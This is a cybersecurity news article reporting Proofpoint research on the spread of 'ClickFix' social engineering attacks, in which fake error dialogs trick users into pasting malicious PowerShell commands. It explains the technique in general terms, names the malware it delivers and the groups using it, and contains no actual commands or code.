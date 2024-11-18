Threat actors are ramping up the use of ‘ClickFix’ social engineering attacks, with this tactic likely proving highly effective for malware deployment. A new analysis by Proofpoint highlighted numerous campaigns by multiple different threat actors utilizing this tactic since March 2024. This included a suspected Russian espionage group using this technique to target Ukrainian organizations. Various malware have been deployed using ClickFix, including AsyncRAT, Danabot, DarkGate, Lumma Stealer and NetSupport.

Number of observed ClickFix campaigns from March to October 2024. Source: Proofpoint

“The ClickFix technique is growing in popularity and is being used by many financially motivated threat actors, as well as reportedly by suspected espionage-focused groups. Given the widespread adoption, it is likely this technique is very effective,” the researchers wrote. Read now: ClickFix Exploits Users with Fake Errors and Malicious Code ClickFix Attacks Explained ClickFix is a unique social engineering technique that uses dialogue boxes containing fake error messages to lure people into copying, pasting and running malicious content on their own computer. It is effective at bypassing security protections as the user infects themselves. This tactic preys on users’ desire to fix problems themselves rather than alerting their IT team or anyone else. The dialogue boxes can originate from a range of sources, including compromised websites, documents, HTML attachments and malicious URLs. Threat actors have been observed impersonating various software and services using the ClickFix technique, including common enterprise software such as Microsoft Word and Google Chrome. The dialogue box contains instructions that purport to “fix” the problem, but will either lead to: The user automatically copying and pasting a malicious script into the PowerShell terminal or the Windows dialog box to eventually run a malicious script via PowerShell, or

The user manually opening PowerShell and copying and pasting the provided command

Example of early ClickFix technique used by a fake update website compromise threat cluster known as ClearFake. Source: Proofpoint